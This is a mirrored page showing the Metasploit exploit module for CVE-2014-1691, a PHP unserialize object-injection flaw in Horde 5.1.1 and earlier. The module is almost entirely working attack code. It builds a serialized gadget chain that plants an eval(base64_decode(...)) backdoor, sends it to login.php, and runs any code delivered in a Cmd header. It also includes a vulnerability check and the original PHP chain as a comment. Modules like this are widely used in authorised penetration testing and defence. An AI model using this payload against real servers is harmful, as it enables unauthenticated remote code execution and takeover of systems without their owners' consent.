Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/webapp/horde_unserialize_exec.rb
19718 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpClient
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Horde Framework Unserialize PHP Code Execution',
16
'Description' => %q{
17
This module exploits a php unserialize() vulnerability in Horde <= 5.1.1 which could be
18
abused to allow unauthenticated users to execute arbitrary code with the permissions of
19
the web server. The dangerous unserialize() exists in the 'lib/Horde/Variables.php' file.
20
The exploit abuses the __destruct() method from the Horde_Kolab_Server_Decorator_Clean
21
class to reach a dangerous call_user_func() call in the Horde_Prefs class.
22
},
23
'Author' => [
24
'EgiX', # Exploitation technique and Vulnerability discovery (originally reported by the vendor)
25
'juan vazquez' # Metasploit module
26
],
27
'License' => MSF_LICENSE,
28
'References' => [
29
[ 'CVE', '2014-1691' ],
30
[ 'URL', 'http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection' ],
31
[ 'URL', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737149' ],
32
[ 'URL', 'https://github.com/horde/horde/commit/da6afc7e9f4e290f782eca9dbca794f772caccb3' ]
33
],
34
'Privileged' => false,
35
'Platform' => ['php'],
36
'Arch' => ARCH_PHP,
37
'Payload' => {
38
'DisableNops' => true
39
},
40
'Targets' => [ ['Horde 5', {}], ],
41
'DefaultTarget' => 0,
42
'DisclosureDate' => '2013-06-27',
43
'Notes' => {
44
'Reliability' => UNKNOWN_RELIABILITY,
45
'Stability' => UNKNOWN_STABILITY,
46
'SideEffects' => UNKNOWN_SIDE_EFFECTS
47
}
48
)
49
)
50
51
register_options(
52
[
53
OptString.new('TARGETURI', [ true, "The base path to Horde", "/horde/"])
54
]
55
)
56
end
57
58
def check
59
flag = rand_text_alpha(rand(10) + 20)
60
res = send_request_exploit("print #{flag};die;")
61
if res and res.body and res.body.to_s =~ /#{flag}/
62
return Exploit::CheckCode::Vulnerable
63
end
64
65
return Exploit::CheckCode::Safe
66
end
67
68
def exploit
69
print_status("Testing injection...")
70
unless check == Exploit::CheckCode::Vulnerable
71
fail_with(Failure::NotVulnerable, "#{peer} - Target isn't vulnerable, exiting...")
72
end
73
74
print_status("Exploiting the unserialize()...")
75
send_request_exploit(payload.encoded)
76
end
77
78
def send_request_exploit(p)
79
php_injection = "eval(base64_decode($_SERVER[HTTP_CMD]));die();"
80
81
payload_serialized = "O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";"
82
payload_serialized << "O:20:\"Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";"
83
payload_serialized << "a:2:{i:0;O:12:\"Horde_Config\":1:{s:13:\"\x00*\x00_oldConfig\";s:#{php_injection.length}:\"#{php_injection}\";}i:1;s:13:\"readXMLConfig\";}}"
84
payload_serialized << "s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";a:1:{i:0;i:1;}}}}"
85
payload_serialized << "s:13:\"\x00*\x00_prefnames\";a:1:{s:10:\"identities\";i:0;}}s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}"
86
87
send_request_cgi(
88
{
89
'uri' => normalize_uri(target_uri.path.to_s, "login.php"),
90
'method' => 'POST',
91
'vars_post' => {
92
'_formvars' => payload_serialized
93
},
94
'headers' => {
95
'Cmd' => Rex::Text.encode_base64(p)
96
}
97
}
98
)
99
end
100
end
101
102
=begin
103
104
PHP chain by EgiX: http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection
105
106
class Horde_Config
107
{
108
protected $_oldConfig = "phpinfo();die;";
109
}
110
111
class Horde_Prefs_Scope
112
{
113
protected $_prefs = array(1);
114
}
115
116
class Horde_Prefs
117
{
118
protected $_opts, $_scopes;
119
120
function __construct()
121
{
122
$this->_opts['sizecallback'] = array(new Horde_Config, 'readXMLConfig');
123
$this->_scopes['horde'] = new Horde_Prefs_Scope;
124
}
125
}
126
127
class Horde_Prefs_Identity
128
{
129
protected $_prefs, $_prefnames;
130
131
function __construct()
132
{
133
$this->_prefs = new Horde_Prefs;
134
$this->_prefnames['identities'] = 0;
135
}
136
}
137
138
class Horde_Kolab_Server_Decorator_Clean
139
{
140
private $_server, $_added = array(1);
141
142
function __construct()
143
{
144
$this->_server = new Horde_Prefs_Identity;
145
}
146
}
147
148
$popchain = serialize(new Horde_Kolab_Server_Decorator_Clean);
149
150
=end
151
152